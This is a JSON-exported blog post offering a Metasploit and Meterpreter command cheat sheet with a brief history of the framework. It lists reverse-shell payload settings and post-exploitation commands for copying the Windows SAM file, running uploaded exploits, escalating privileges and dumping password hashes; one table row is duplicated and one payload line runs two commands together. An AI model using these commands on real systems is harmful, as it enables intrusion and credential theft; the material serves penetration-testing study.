{"id":1873,"date":"2022-01-01T12:00:24","date_gmt":"2022-01-01T12:00:24","guid":{"rendered":"https:\/\/www.securedyou.com\/?p=1873"},"modified":"2022-01-01T18:18:07","modified_gmt":"2022-01-01T18:18:07","slug":"best-metasploit-commands-cheat-sheet-list","status":"publish","type":"post","link":"https:\/\/www.securedyou.com\/best-metasploit-commands-cheat-sheet-list\/","title":{"rendered":"Metasploit Commands List 2022 – Use Metasploit like a Pro"},"content":{"rendered":"
Want to use Metasploit Pro Framework<\/strong> or Metasploit Unleashed<\/strong>? Well, you will need to know their commands first!. Below we are sharing with you the latest Metasploit Commands List<\/strong> of 2022<\/strong>. This cheat sheet<\/strong> contains all the commands you will ever need from very basics to advance!<\/p>\n In this guide, we will talk about the very basics of the Metasploit commands cheat sheet<\/strong> which can be used in the command-line interface. There are also many other command-line consoles available over the internet (such as MSFConsole Command Line<\/strong>) but they are really hard to use and understand.<\/p>\n <\/p>\n Metasploit is a product that can be used to break into a remote system and it can also be used to test the vulnerability of a computer system. Like all the other Information security tools Metasploit can also be used for both purposes (Unauthorized and Legitimate activities). The Rapid7 has also added the two proprietary editions or versions called the Metasploit Pro and Metasploit Express. You can also see some of our Kali Linux Terminal commands for hacking<\/a>.<\/p>\n Metasploit highlights the risk and remediation of particular bugs that might be available within your Personal Computer (PC). Later on, the fuzzing tool was also included in Metasploit 3.0 which was used to discover the vulnerabilities of software even with the exploits for the known bugs. After some time the local wireless (802.11) toolset was also added into the Metasploit 3.0 in the month of November 2006. After all these updates the Rapid7 released the Metasploit 4.0 in the month of August 2011.<\/p>\n You can get Metasploit Pro Framework from the below page:<\/p>\n Download Metasploit Pro Framework Free<\/span><\/a><\/p>\n H. D. Moore was the creator of this portable network tool named Metasploit using Perl in 2003. In 2007, the Metasploit Framework was totally rewritten in Ruby. On October 21st<\/sup>, 2009, Metasploit announced that it has been bought or acquired by the Rapid7. Rapid7 is a security company that provides many sorts of unified vulnerability managing solutions.<\/p>\n \u00a0<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\nWhat is Metasploit Framework?<\/strong><\/h2>\n
A Brief History of Metasploit Framework<\/strong><\/h2>\n
List of Latest Metasploit Commands 2022 (New)<\/strong><\/h2>\n
\n
\n\n
\n Command<\/strong><\/td>\n Description of CMD<\/strong><\/td>\n<\/tr>\n \n set payload windows\/meterpreter\/reverse_tcp<\/em><\/td>\n Windows reverse tcp payload<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Windows VNC payload for Meterpreter<\/strong><\/h2>\n
\n\n
\n Command<\/strong><\/td>\n Description of CMD<\/strong><\/td>\n<\/tr>\n \n set payload windows\/vncinject\/reverse_tcpset ViewOnly false<\/em><\/td>\n Meterpreter Windows VNC Payload<\/em><\/p>\n Linux Reverse Meterpreter payload<\/strong><\/h2>\n
\n\n
\n Command<\/strong><\/td>\n Description of CMD<\/strong><\/td>\n<\/tr>\n \n set payload linux\/meterpreter\/reverse_tcp<\/em><\/td>\n Meterpreter Linux Reverse Payload<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n Meterpreter Cheat Sheet Commands (2022 Latest)<\/strong><\/h2>\n
\n\n
\n Command<\/strong><\/td>\n Description of CMD<\/strong><\/td>\n<\/tr>\n \n upload file c:\\\\windows<\/em><\/td>\n Meterpreter uploads file to the Windows target machine<\/em><\/td>\n<\/tr>\n \n download c:\\\\windows\\\\repair\\\\sam \/tmp<\/em><\/td>\n Meterpreter download file from Windows target<\/em><\/td>\n<\/tr>\n \n download c:\\\\windows\\\\repair\\\\sam \/tmp<\/em><\/td>\n Meterpreter downloads the files from Windows target machine<\/em><\/td>\n<\/tr>\n \n execute -f c:\\\\windows\\temp\\exploit.exe<\/em><\/td>\n Meterpreter run .exe on target \u2013 handy for executing uploaded exploits<\/em><\/td>\n<\/tr>\n \n execute -f cmd -c<\/em><\/td>\n Creates a new channel using the cmd shell<\/em><\/td>\n<\/tr>\n \n ps<\/em><\/td>\n Meterpreter shows you the current processes that are running<\/em><\/td>\n<\/tr>\n \n shell<\/em><\/td>\n Meterpreter gets the shell access on the target machine or server<\/em><\/td>\n<\/tr>\n \n getsystem<\/em><\/td>\n Meterpreter attempts to do privilege escalation to gain access to the target<\/em><\/td>\n<\/tr>\n \n hashdump<\/em><\/td>\n Meterpreter attempts to dump the hashes on the target<\/em><\/td>\n<\/tr>\n \n portfwd add \u2013l 3389 \u2013p 3389 \u2013r target<\/em><\/td>\n Meterpreter creates a port forward to the target machine<\/em><\/td>\n<\/tr>\n \n portfwd delete \u2013l 3389 \u2013p 3389 \u2013r target<\/em><\/td>\n Meterpreter deletes the port forward function<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n